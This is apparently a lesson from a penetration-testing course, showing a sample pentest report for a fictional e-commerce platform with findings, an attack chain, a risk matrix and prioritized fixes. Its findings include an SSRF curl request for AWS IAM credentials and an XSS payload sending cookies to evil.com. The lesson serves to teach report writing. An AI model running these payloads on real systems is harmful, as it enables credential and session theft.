Advanced Pentest Report
๐ฅ Vibe Prompt
"Write a professional pentest report: executive summary, risk assessment, findings, recommendations."
Report Template
# Penetration Test Report: Target Application
## 1. Executive Summary
XYZ Corp engaged us to pentest their e-commerce platform.
Scope: web app, mobile API, infrastructure (10 IPs)
Duration: 2 weeks (May 1-14, 2024)
Team: 2 senior pentesters
### Key Findings
- Total vulnerabilities: 12 (3 Critical, 4 High, 3 Medium, 2 Low)
- Attack chain achieved: Unauthenticated RCE via SSRF โ Cloud metadata โ IAM keys
- CVSS average: 7.8/10
### Risk Rating
| Severity | Count |
|----------|-------|
| Critical | 3 |
| High | 4 |
| Medium | 3 |
| Low | 2 |
## 2. Scope
- Web Application: https://shop.example.com
- Mobile API: https://api.example.com/v2
- Infrastructure: 10.0.0.0/24
- Source Code: GitHub repo (static analysis only)
## 3. Methodology
- Recon: passive (OSINT) + active (scanning)
- Automated: Nessus, Burp Suite Pro, Acunetix
- Manual: Business logic, auth, IDOR, race conditions
- Mobile: Frida, Objection, APKTool
## 4. Findings Detail
### CRITICAL: SSRF to Cloud Metadata (CVSS 9.1)
**Location:** /api/fetch?url=
**Description:** The fetch endpoint doesn't validate URLs.
Attacker can access AWS metadata service.
**Reproduction:**
```bash
curl "https://shop.example.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"
Impact: Full AWS credential compromise โ data breach
Recommendation:
- Block private IP ranges (169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12)
- Use an allowlist of approved URLs
- Remove the feature or restrict to specific domains
HIGH: Stored XSS (CVSS 6.8)
Location: User profile name field Description: Name field not sanitized. Stored XSS in profile.
Reproduction:
POST /api/profile
{"name": "<script>fetch('https://evil.com/steal?c='+document.cookie)</script>"}
Impact: Session hijacking, admin account takeover
Recommendation:
- Sanitize all user input (bleach, DOMPurify)
- Implement Content-Security-Policy
- Use HttpOnly cookies
5. Attack Chain Walkthrough
1. [Recon] Found fetch API endpoint via JS analysis
2. [SSRF] Accessed AWS metadata โ retrieved IAM credentials
3. [Cloud] Used IAM keys to list S3 buckets โ customer data exposed
4. [Auth] Weak JWT secret โ forged admin token
5. [Impact] Full admin access to customer DB
Total time: 4 hours (automated + manual)
6. Risk Matrix
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Impact \ Likelihood | Low | Med | High โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ Critical | 0 | 1 | 2 โ
โ High | 1 | 2 | 1 โ
โ Medium | 2 | 1 | 0 โ
โ Low | 2 | 0 | 0 โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
7. Recommendations by Priority
P0 (Immediate):
- Fix SSRF (block private IPs)
- Rotate all IAM keys
- Implement WAF (Cloudflare)
P1 (This sprint):
- Sanitize all user inputs (XSS)
- Change JWT secret to 256-bit random
- Rate limit login endpoint
P2 (Next sprint):
- Implement CSP headers
- Add security headers (HSTS, X-Frame-Options)
- Move secrets to AWS Secrets Manager
P3 (Backlog):
- Regular dependency scanning
- Bug bounty program
- Security training for developers
8. Tools Used
| Tool | Purpose | |------|---------| | Burp Suite Pro | Web proxy, scanner | | Nmap | Network scanning | | Gobuster | Directory brute force | | Frida | Mobile runtime | | Nessus | Vulnerability scanning | | Metasploit | Exploitation | | Custom Python scripts | Business logic testing |
PenTesting Advanced Course Complete! ๐
- โ Recon & OSINT
- โ Exploit Development
- โ Web Exploitation
- โ Mobile & API
- โ Report Writing
## Report Writing Principles
| Principle | Why |
|-----------|-----|
| Executive summary first | Non-technical audience |
| Reproduce steps clearly | Developer can verify |
| Business impact | Prioritization |
| Fix recommendations | Actionable |
| Attack chain demo | Shows real risk |
| Risk matrix | Visual priority |
## Best Practices
- Show attack chain (not just isolated bugs)
- Provide clear reproduction steps (curl commands)
- Map findings to OWASP Top 10 / CWE
- Give CVSS score for each finding
- Separate technical vs executive sections
- Include positive findings (things done right)
- Follow up after retest